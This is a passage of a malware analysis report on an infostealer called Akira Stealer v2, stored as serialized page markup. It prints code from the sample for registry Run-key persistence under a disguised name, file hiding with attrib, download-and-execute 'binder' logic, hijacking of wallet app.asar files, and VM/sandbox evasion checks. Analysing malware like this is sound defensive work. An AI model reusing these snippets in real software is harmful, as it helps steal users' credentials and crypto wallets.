",[3724,17220,14381],{},[370,17222,17223,17225,17226],{},[3724,17224,14381],{}," starts ",[3724,17227,13849],{},[370,17229,17230,17232,17233],{},[3724,17231,13849],{}," executes the file ",[3724,17234,14391],{},[629,17236,17238],{"id":17237},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[353,17240,14147],{},[353,17242,17243,17244,17246],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[3724,17245,13870],{},") to a hidden location within the user’s profile.",[353,17248,17249],{},[433,17250,17251],{},"Target Directory",[353,17253,17254],{},"The file is copied to a directory that mimics legitimate Windows components:",[3102,17256,17258],{"className":16251,"code":17257,"language":16253,"meta":402,"style":402},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[3724,17259,17260],{"__ignoreMap":402},[7258,17261,17262,17265,17268,17270],{"class":14951,"line":14952},[7258,17263,17264],{"class":16260},"%",[7258,17266,17267],{"class":16043},"APPDATA",[7258,17269,17264],{"class":16260},[7258,17271,17272],{"class":16270},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[353,17274,17275],{},"This location is intentionally chosen:",[367,17277,17278,17281],{},[370,17279,17280],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[370,17282,17283],{},"The directory name mimics legitimate Microsoft application folders, making it less suspicious.",[353,17285,17286],{},[433,17287,17288],{},"Copy Mechanism:",[353,17290,17291],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[3102,17293,17295],{"className":16251,"code":17294,"language":16253,"meta":402,"style":402},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[3724,17296,17297,17306,17316,17325,17334,17341,17348,17355,17362,17367],{"__ignoreMap":402},[7258,17298,17299,17301,17304],{"class":14951,"line":14952},[7258,17300,16998],{"class":16270},[7258,17302,17303],{"class":16035},"copyFileSync",[7258,17305,16277],{"class":16270},[7258,17307,17308,17311,17314],{"class":14951,"line":403},[7258,17309,17310],{"class":16270},"  process.env.",[7258,17312,17313],{"class":16043},"PORTABLE_EXECUTABLE_FILE",[7258,17315,16307],{"class":16270},[7258,17317,17318,17321,17323],{"class":14951,"line":704},[7258,17319,17320],{"class":16270},"  path.",[7258,17322,16639],{"class":16035},[7258,17324,16277],{"class":16270},[7258,17326,17327,17330,17332],{"class":14951,"line":15337},[7258,17328,17329],{"class":16270},"    process.env.",[7258,17331,17267],{"class":16043},[7258,17333,16307],{"class":16270},[7258,17335,17336,17339],{"class":14951,"line":13492},[7258,17337,17338],{"class":16039},"    \"Microsoft\"",[7258,17340,16307],{"class":16270},[7258,17342,17343,17346],{"class":14951,"line":15666},[7258,17344,17345],{"class":16039},"    \"Internet Explorer\"",[7258,17347,16307],{"class":16270},[7258,17349,17350,17353],{"class":14951,"line":13493},[7258,17351,17352],{"class":16039},"    \"UserData\"",[7258,17354,16307],{"class":16270},[7258,17356,17357,17360],{"class":14951,"line":17117},[7258,17358,17359],{"class":16039},"    \"Updater.exe\"",[7258,17361,16307],{"class":16270},[7258,17363,17364],{"class":14951,"line":17123},[7258,17365,17366],{"class":16270},"  ),\n",[7258,17368,17370],{"class":14951,"line":17369},10,[7258,17371,16326],{"class":16270},[367,17373,17374,17377],{},[370,17375,17376],{},"PORTABLE_EXECUTABLE_FILE is an environment variable automatically set by many packers (such as Electron) to reference the path of the executing binary.",[370,17378,17379],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[353,17381,17382],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[353,17384,17385,17388],{},[433,17386,17387],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[367,17390,17391,17394],{},[370,17392,17393],{},"The loader can re-trigger itself across system reboots.",[370,17395,17396],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.",[629,17398,17400],{"id":17399},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[353,17402,14147],{},[353,17404,17405,17406,17408],{},"In addition to downloading and executing the main stealer payload (",[3724,17407,13878],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for persistence, distraction, or deployment of additional malware modules.",[353,17410,17411],{},[433,17412,17413],{},"Conditional Execution",[353,17415,17416],{},"The binder logic is only activated if a specific flag is set:",[3102,17418,17420],{"className":16251,"code":17419,"language":16253,"meta":402,"style":402},"enableBinder = true;\n",[3724,17421,17422],{"__ignoreMap":402},[7258,17423,17424,17427,17429,17432],{"class":14951,"line":14952},[7258,17425,17426],{"class":16270},"enableBinder ",[7258,17428,16427],{"class":16260},[7258,17430,17431],{"class":16043}," true",[7258,17433,16707],{"class":16270},[353,17435,17436,17437,17440],{},"In the sample analyzed, this value was set to ",[3724,17438,17439],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.",[353,17442,17443],{},[433,17444,17445],{},"Binder Download Logic",[353,17447,17448,17449,17452],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[3724,17450,17451],{},"%BINDERURL%"," placeholder:",[3102,17454,17456],{"className":16251,"code":17455,"language":16253,"meta":402,"style":402},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[3724,17457,17458,17472,17492,17507],{"__ignoreMap":402},[7258,17459,17460,17462,17465,17467,17470],{"class":14951,"line":14952},[7258,17461,16261],{"class":16260},[7258,17463,17464],{"class":16043}," fileUrl",[7258,17466,16267],{"class":16260},[7258,17468,17469],{"class":16039}," \"%BINDERURL%\"",[7258,17471,16707],{"class":16270},[7258,17473,17474,17476,17478,17480,17482,17484,17486,17488,17490],{"class":14951,"line":403},[7258,17475,16261],{"class":16260},[7258,17477,16731],{"class":16043},[7258,17479,16267],{"class":16260},[7258,17481,16736],{"class":16260},[7258,17483,16739],{"class":16270},[7258,17485,16742],{"class":16035},[7258,17487,16745],{"class":16270},[7258,17489,16748],{"class":16039},[7258,17491,16751],{"class":16270},[7258,17493,17494,17496,17498,17500,17502,17504],{"class":14951,"line":704},[7258,17495,16261],{"class":16260},[7258,17497,16769],{"class":16043},[7258,17499,16267],{"class":16260},[7258,17501,16774],{"class":16270},[7258,17503,16777],{"class":16035},[7258,17505,17506],{"class":16270},"(binderFile);\n",[7258,17508,17509,17511,17513],{"class":14951,"line":15337},[7258,17510,16785],{"class":16270},[7258,17512,16788],{"class":16035},[7258,17514,16791],{"class":16270},[367,17516,17517,17522],{},[370,17518,15859,17519,17521],{},[3724,17520,16618],{}," file is saved into the system's temporary directory.",[370,17523,17524,17525,17527],{},"Like ",[3724,17526,16138],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[353,17529,17530],{},[433,17531,17532],{},"Execution Strategy",[353,17534,17535,17536,17538],{},"After successful download, the script invokes the downloaded binary using ",[3724,17537,14381],{},", ensuring that it runs in a new shell context:",[3102,17540,17542],{"className":16251,"code":17541,"language":16253,"meta":402,"style":402},"exec(`start cmd /c start ${binderFile}`, ...);\n",[3724,17543,17544],{"__ignoreMap":402},[7258,17545,17546,17548,17550,17553,17556,17559,17561,17564],{"class":14951,"line":14952},[7258,17547,17179],{"class":16035},[7258,17549,16461],{"class":16270},[7258,17551,17552],{"class":16039},"`start cmd /c start ${",[7258,17554,17555],{"class":16270},"binderFile",[7258,17557,17558],{"class":16039},"}`",[7258,17560,2454],{"class":16270},[7258,17562,17563],{"class":16260},"...",[7258,17565,16326],{"class":16270},[353,17567,17568],{},"To increase reliability, the script includes retry logic:",[3102,17570,17572],{"className":16251,"code":17571,"language":16253,"meta":402,"style":402},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[3724,17573,17574,17586,17597],{"__ignoreMap":402},[7258,17575,17576,17579,17582,17584],{"class":14951,"line":14952},[7258,17577,17578],{"class":16035},"setTimeout",[7258,17580,17581],{"class":16270},"(() ",[7258,17583,17050],{"class":16260},[7258,17585,17053],{"class":16270},[7258,17587,17588,17591,17593,17595],{"class":14951,"line":403},[7258,17589,17590],{"class":16035},"  exec",[7258,17592,16461],{"class":16270},[7258,17594,17563],{"class":16260},[7258,17596,16326],{"class":16270},[7258,17598,17599,17602,17605],{"class":14951,"line":704},[7258,17600,17601],{"class":16270},"}, ",[7258,17603,17604],{"class":16043},"5000",[7258,17606,16326],{"class":16270},[353,17608,17609],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[353,17611,17612],{},[433,17613,17614],{},"Use Cases for the Binder",[353,17616,17617],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[367,17619,17620,17623,17626,17629],{},[370,17621,17622],{},"Reinstall or relaunch the primary malware components",[370,17624,17625],{},"Display fake installers or decoy applications",[370,17627,17628],{},"Deploy additional spyware, backdoors, or ransomware",[370,17630,17631],{},"Modify system settings or disable security features",[2548,17633,17635],{"id":17634},"_63-summary","6.3 Summary",[353,17637,10713],{},[353,17639,17640,17642],{},[3724,17641,16077],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[367,17644,17645,17650,17653,17658],{},[370,17646,17647,17648,8133],{},"Retrieves further malware (",[3724,17649,16138],{},[370,17651,17652],{},"Modifies payload behavior dynamically",[370,17654,17655,17656,8133],{},"Launches the actual stealer script (",[3724,17657,13878],{},[370,17659,17660,17661],{},"Reinforces persistence by restoring ",[3724,17662,13870],{},[353,17664,17665,17666,17669],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[433,17667,17668],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[13828,17671,17673,17674,8133],{"id":17672},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[3724,17675,13878],{},[353,17677,9352],{},[2548,17679,17681],{"id":17680},"_71-high-level-functionality","7.1. High-Level Functionality",[353,17683,10713],{},[353,17685,17686,17687,17689],{},"Akira Stealer v2 (",[3724,17688,13878],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[2548,17691,17693],{"id":17692},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[353,17695,10713],{},[629,17697,17699],{"id":17698},"_721-execution-chain-context","7.2.1 Execution Chain Context",[353,17701,14147],{},[353,17703,17704,17706],{},[3724,17705,13878],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[3102,17708,17712],{"className":17709,"code":17710,"language":17711,"meta":402,"style":402},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[3724,17713,17714,17719,17724,17729],{"__ignoreMap":402},[7258,17715,17716],{"class":14951,"line":14952},[7258,17717,17718],{},"Updater.exe\n",[7258,17720,17721],{"class":14951,"line":403},[7258,17722,17723],{},"  └── main.exe (Electron app)\n",[7258,17725,17726],{"class":14951,"line":704},[7258,17727,17728],{},"        └── cmd.exe\n",[7258,17730,17731],{"class":14951,"line":15337},[7258,17732,17733],{},"              └── python.exe astor.py\n",[353,17735,17736,17737,17739],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[3724,17738,13870],{}," initiates the sequence and is responsible for maintaining persistence.",[629,17741,17743],{"id":17742},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[353,17745,14147],{},[353,17747,17748,17749,17751],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. This ensures that ",[3724,17750,13870],{}," is executed on each system startup:",[3102,17753,17757],{"className":17754,"code":17755,"language":17756,"meta":402,"style":402},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[3724,17758,17759,17764],{"__ignoreMap":402},[7258,17760,17761],{"class":14951,"line":14952},[7258,17762,17763],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[7258,17765,17766],{"class":14951,"line":403},[7258,17767,17768],{},"os.system(command)\n",[367,17770,17771,17778,17786],{},[370,17772,17773,14252,17776],{},[433,17774,17775],{},"Path",[3724,17777,14922],{},[370,17779,17780,14252,17783,17785],{},[433,17781,17782],{},"Value name",[3724,17784,14930],{}," (chosen to appear benign)",[370,17787,17788,17791,17792],{},[433,17789,17790],{},"Payload path",": Typically in ",[3724,17793,17794],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[353,17796,17797,17798,17801],{},"This command silently writes the autorun entry via PowerShell or native ",[3724,17799,17800],{},"os.system()"," execution.",[629,17803,17805],{"id":17804},"_723-file-concealment","7.2.3 File Concealment",[353,17807,14147],{},[353,17809,17810],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[3102,17812,17814],{"className":17754,"code":17813,"language":17756,"meta":402,"style":402},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[3724,17815,17816],{"__ignoreMap":402},[7258,17817,17818],{"class":14951,"line":14952},[7258,17819,17813],{},[367,17821,17822,17828],{},[370,17823,17824,17827],{},[3724,17825,17826],{},"+h",": Marks the file as hidden",[370,17829,17830,17833],{},[3724,17831,17832],{},"+s",": Marks the file as a protected system file",[353,17835,17836],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[629,17838,17840],{"id":17839},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[353,17842,14147],{},[353,17844,17845,17846,17848,17849,2454,17852,17855],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[3724,17847,14326],{}," archive in Electron-based desktop wallets (e.g., ",[433,17850,17851],{},"Exodus",[433,17853,17854],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[353,17857,17858],{},"The logic looks for known wallet app paths:",[3102,17860,17862],{"className":17754,"code":17861,"language":17756,"meta":402,"style":402},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[3724,17863,17864],{"__ignoreMap":402},[7258,17865,17866],{"class":14951,"line":14952},[7258,17867,17861],{},[353,17869,17870,17871,456],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[3724,17872,13870],{},[2548,17874,17876,17877,8133],{"id":17875},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[3724,17878,17879],{},"VmProtect",[353,17881,10713],{},[629,17883,17885],{"id":17884},"_731-introduction","7.3.1 Introduction",[353,17887,14147],{},[353,17889,17890,17891,17893,17894,17896],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[748,17892,13939],{}," implements a comprehensive VM/sandbox detection module (",[3724,17895,17879],{},") that aggressively identifies and aborts execution under analyst-controlled environments. This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[629,17898,17900],{"id":17899},"_732-overview","7.3.2 Overview",[353,17902,14147],{},[353,17904,15859,17905,17907],{},[3724,17906,17879],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[367,17909,17910,17916],{},[370,17911,17912,17915],{},[433,17913,17914],{},"Level 1",": Lightweight, fast checks",[370,17917,17918,17921],{},[433,17919,17920],{},"Level 2",": In-depth, comprehensive probes",[353,17923,17924,17925,17928,17929,17932,17933,17936],{},"If ",[3724,17926,17927],{},"VmProtect.isVM(level)"," returns ",[3724,17930,17931],{},"True",", the malware calls ",[3724,17934,17935],{},"sys.exit()",", preventing further analysis.",[629,17938,17940],{"id":17939},"_733-detection-levels","7.3.3 Detection Levels",[353,17942,14147],{},[8921,17944,8923,17946],{"style":17945},"width:100%; border-collapse: collapse;",[8925,17947,17948,8923,17957,8923,17967,8923,17977,8923,17986,8923,17996,8923,18005,8923,18014],{},[8928,17949,2557,17950,2557,17953,2557,17955,8923],{},[8932,17951,17952],{},"Feature",[8932,17954,17914],{"style":10857},[8932,17956,17920],{"style":10857},[8928,17958,2557,17959,2557,17962,2557,17965,8923],{},[8948,17960,17961],{},"HTTPSimulation",[8948,17963,17964],{"style":10857},"✔️",[8948,17966,17964],{"style":10857},[8928,17968,2557,17970,2557,17973,2557,17975,8923],{"style":17969},"background-color: #f5f5f5;",[8948,17971,17972],{},"Computer-name blacklist",[8948,17974,17964],{"style":10857},[8948,17976,17964],{"style":10857},[8928,17978,2557,17979,2557,17982,2557,17984,8923],{},[8948,17980,17981],{},"User-account blacklist",[8948,17983,17964],{"style":10857},[8948,17985,17964],{"style":10857},[8928,17987,2557,17988,2557,17991,2557,17994,8923],{"style":17969},[8948,17989,17990],{},"Hardware-UUID blacklist",[8948,17992,17993],{"style":10857},"❌",[8948,17995,17964],{"style":10857},[8928,17997,2557,17998,2557,18001,2557,18003,8923],{},[8948,17999,18000],{},"Public-hosting API check",[8948,18002,17993],{"style":10857},[8948,18004,17964],{"style":10857},[8928,18006,2557,18007,2557,18010,2557,18012,8923],{"style":17969},[8948,18008,18009],{},"Registry & GPU hints",[8948,18011,17993],{"style":10857},[8948,18013,17964],{"style":10857},[8928,18015,2557,18016,2557,18019,2557,18021,8923],{},[8948,18017,18018],{},"Task-killing background",[8948,18020,17964],{"style":10857},[8948,18022,17964],{"style":10857},[2559,18024],{"className":18025},[14110,14111],[629,18027,18029,18030,18032],{"id":18028},"_734-vmprotect-architecture","7.3.4 ",[3724,18031,17879],{}," Architecture",[353,18034,14147],{},[353,18036,15859,18037,18039],{},[3724,18038,17879],{}," class exposes the following primary methods:",[367,18041,18042,18049,18056,18063,18070,18077,18084,18091],{},[370,18043,18044],{},[433,18045,18046],{},[3724,18047,18048],{},"checkUUID()",[370,18050,18051],{},[433,18052,18053],{},[3724,18054,18055],{},"checkComputerName()",[370,18057,18058],{},[433,18059,18060],{},[3724,18061,18062],{},"checkUsers()",[370,18064,18065],{},[433,18066,18067],{},[3724,18068,18069],{},"checkHosting()",[370,18071,18072],{},[433,18073,18074],{},[3724,18075,18076],{},"checkHTTPSimulation()",[370,18078,18079],{},[433,18080,18081],{},[3724,18082,18083],{},"checkRegistry()",[370,18085,18086],{},[433,18087,18088],{},[3724,18089,18090],{},"killTasks()",[370,18092,18093],{},[433,18094,18095],{},[3724,18096,18097],{},"isVM(level)",[353,18099,18100,18101,18104],{},"Each method returns a boolean or executes evasion steps. The ",[3724,18102,18103],{},"isVM"," wrapper aggregates these checks based on the specified level.",[8921,18106,8923,18107],{"style":17945},[8925,18108,18109,8923,18120,8923,18134,8923,18148,8923,18161,8923,18174,8923,18187,8923,18200,8923,18215],{},[8928,18110,2557,18111,2557,18115,2557,18118,8923],{},[8932,18112,18114],{"style":18113},"text-align: left;","Method",[8932,18116,18117],{"style":18113},"Triggered By",[8932,18119,7440],{"style":18113},[8928,18121,2557,18122,2557,18126,2557,18131,8923],{},[8948,18123,18124],{},[3724,18125,18048],{},[8948,18127,18128],{},[3724,18129,18130],{},"isVM(2)",[8948,18132,18133],{},"WMI UUID blacklist",[8928,18135,2557,18136,2557,18140,2557,18145,8923],{"style":17969},[8948,18137,18138],{},[3724,18139,18055],{},[8948,18141,18142],{},[3724,18143,18144],{},"isVM(1,2)",[8948,18146,18147],{},"Environment hostname match",[8928,18149,2557,18150,2557,18154,2557,18158,8923],{},[8948,18151,18152],{},[3724,18153,18062],{},[8948,18155,18156],{},[3724,18157,18144],{},[8948,18159,18160],{},"Username blacklist",[8928,18162,2557,18163,2557,18167,2557,18171,8923],{"style":17969},[8948,18164,18165],{},[3724,18166,18069],{},[8948,18168,18169],{},[3724,18170,18130],{},[8948,18172,18173],{},"IP hosting provider check via ip-api.com",[8928,18175,2557,18176,2557,18180,2557,18184,8923],{},[8948,18177,18178],{},[3724,18179,18076],{},[8948,18181,18182],{},[3724,18183,18144],{},[8948,18185,18186],{},"HTTPS interception detection",[8928,18188,2557,18189,2557,18193,2557,18197,8923],{"style":17969},[8948,18190,18191],{},[3724,18192,18083],{},[8948,18194,18195],{},[3724,18196,18130],{},[8948,18198,18199],{},"Registry & GPU driver artifacts",[8928,18201,2557,18202,2557,18206,2557,18212,8923],{},[8948,18203,18204],{},[3724,18205,18090],{},[8948,18207,18208,18211],{},[3724,18209,18210],{},"isVM(...)"," spawn",[8948,18213,18214],{},"Terminates known analysis processes",[8928,18216,2557,18217,2557,18221,2557,18224,8923],{"style":17969},[8948,18218,18219],{},[3724,18220,18097],{},[8948,18222,18223],{},"init",[8948,18225,18226,18227,18229],{},"Aggregates checks and calls ",[3724,18228,18090],{}," thread",[2559,18231],{"className":18232},[14110,14111],[3102,18234,18236],{"className":17754,"code":18235,"language":17756,"meta":402,"style":402},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[3724,18237,18238,18243,18248,18253,18258,18263,18268,18273,18278,18283,18288,18294,18300,18306,18312,18318,18324,18330,18336,18342,18348,18354,18360,18366,18372],{"__ignoreMap":402},[7258,18239,18240],{"class":14951,"line":14952},[7258,18241,18242],{},"@staticmethod\n",[7258,18244,18245],{"class":14951,"line":403},[7258,18246,18247],{},"def isVM(level: int) -> bool:\n",[7258,18249,18250],{"class":14951,"line":704},[7258,18251,18252],{},"    # Always start background task-killer\n",[7258,18254,18255],{"class":14951,"line":15337},[7258,18256,18257],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[7258,18259,18260],{"class":14951,"line":13492},[7258,18261,18262],{},"    if level == 1:\n",[7258,18264,18265],{"class":14951,"line":15666},[7258,18266,18267],{},"        # Fast path: HTTPS, hostname & user\n",[7258,18269,18270],{"class":14951,"line":13493},[7258,18271,18272],{},"        return (\n",[7258,18274,18275],{"class":14951,"line":17117},[7258,18276,18277],{},"            VmProtect.checkHTTPSimulation()\n",[7258,18279,18280],{"class":14951,"line":17123},[7258,18281,18282],{},"            or VmProtect.checkComputerName()\n",[7258,18284,18285],{"class":14951,"line":17369},[7258,18286,18287],{},"            or VmProtect.checkUsers()\n",[7258,18289,18291],{"class":14951,"line":18290},11,[7258,18292,18293],{},"        )\n",[7258,18295,18297],{"class":14951,"line":18296},12,[7258,18298,18299],{},"    if level == 2:\n",[7258,18301,18303],{"class":14951,"line":18302},13,[7258,18304,18305],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[7258,18307,18309],{"class":14951,"line":18308},14,[7258,18310,18311],{},"        try:\n",[7258,18313,18315],{"class":14951,"line":18314},15,[7258,18316,18317],{},"            return (\n",[7258,18319,18321],{"class":14951,"line":18320},16,[7258,18322,18323],{},"                VmProtect.checkHTTPSimulation()\n",[7258,18325,18327],{"class":14951,"line":18326},17,[7258,18328,18329],{},"                or VmProtect.checkUUID()\n",[7258,18331,18333],{"class":14951,"line":18332},18,[7258,18334,18335],{},"                or VmProtect.checkComputerName()\n",[7258,18337,18339],{"class":14951,"line":18338},19,[7258,18340,18341],{},"                or VmProtect.checkUsers()\n",[7258,18343,18345],{"class":14951,"line":18344},20,[7258,18346,18347],{},"                or VmProtect.checkHosting()\n",[7258,18349,18351],{"class":14951,"line":18350},21,[7258,18352,18353],{},"                or VmProtect.checkRegistry()\n",[7258,18355,18357],{"class":14951,"line":18356},22,[7258,18358,18359],{},"            )\n",[7258,18361,18363],{"class":14951,"line":18362},23,[7258,18364,18365],{},"        except:\n",[7258,18367,18369],{"class":14951,"line":18368},24,[7258,18370,18371],{},"            return False\n",[7258,18373,18375],{"class":14951,"line":18374},25,[7258,18376,18377],{},"    return False\n",[629,18379,18381],{"id":18380},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[353,18383,14147],{},[353,18385,18386],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[3102,18388,18390],{"className":17754,"code":18389,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[3724,18391,18392,18396,18401,18406,18411,18416,18421,18426,18431,18436],{"__ignoreMap":402},[7258,18393,18394],{"class":14951,"line":14952},[7258,18395,18242],{},[7258,18397,18398],{"class":14951,"line":403},[7258,18399,18400],{},"def checkUUID() -> bool:\n",[7258,18402,18403],{"class":14951,"line":704},[7258,18404,18405],{},"    try:\n",[7258,18407,18408],{"class":14951,"line":15337},[7258,18409,18410],{},"        raw = subprocess.run(\n",[7258,18412,18413],{"class":14951,"line":13492},[7258,18414,18415],{},"            \"wmic csproduct get uuid\", shell=True,\n",[7258,18417,18418],{"class":14951,"line":15666},[7258,18419,18420],{},"            capture_output=True\n",[7258,18422,18423],{"class":14951,"line":13493},[7258,18424,18425],{},"        ).stdout.splitlines()[2].decode().strip()\n",[7258,18427,18428],{"class":14951,"line":17117},[7258,18429,18430],{},"    except:\n",[7258,18432,18433],{"class":14951,"line":17123},[7258,18434,18435],{},"        raw = \"\"\n",[7258,18437,18438],{"class":14951,"line":17369},[7258,18439,18440],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[353,18442,18443],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[629,18445,18447],{"id":18446},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[353,18449,14147],{},[353,18451,18452,18453,18456],{},"The system hostname, accessed via the ",[3724,18454,18455],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[3102,18458,18460],{"className":17754,"code":18459,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... dozens more entries ...\n)\n",[3724,18461,18462,18466,18471,18476,18481,18485,18490,18495,18500,18505],{"__ignoreMap":402},[7258,18463,18464],{"class":14951,"line":14952},[7258,18465,18242],{},[7258,18467,18468],{"class":14951,"line":403},[7258,18469,18470],{},"def checkComputerName() -> bool:\n",[7258,18472,18473],{"class":14951,"line":704},[7258,18474,18475],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[7258,18477,18478],{"class":14951,"line":15337},[7258,18479,18480],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[7258,18482,18483],{"class":14951,"line":13492},[7258,18484,17114],{"emptyLinePlaceholder":415},[7258,18486,18487],{"class":14951,"line":15666},[7258,18488,18489],{},"BLACKLISTED_COMPUTERNAMES = (\n",[7258,18491,18492],{"class":14951,"line":13493},[7258,18493,18494],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[7258,18496,18497],{"class":14951,"line":17117},[7258,18498,18499],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[7258,18501,18502],{"class":14951,"line":17123},[7258,18503,18504],{},"    # ... dozens more entries ...\n",[7258,18506,18507],{"class":14951,"line":17369},[7258,18508,18509],{},")\n",[353,18511,18512],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[629,18514,18516],{"id":18515},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[353,18518,14147],{},[353,18520,18521],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". These names are low-entropy and often hardcoded in open source sandbox environments.",[3102,18523,18525],{"className":17754,"code":18524,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in 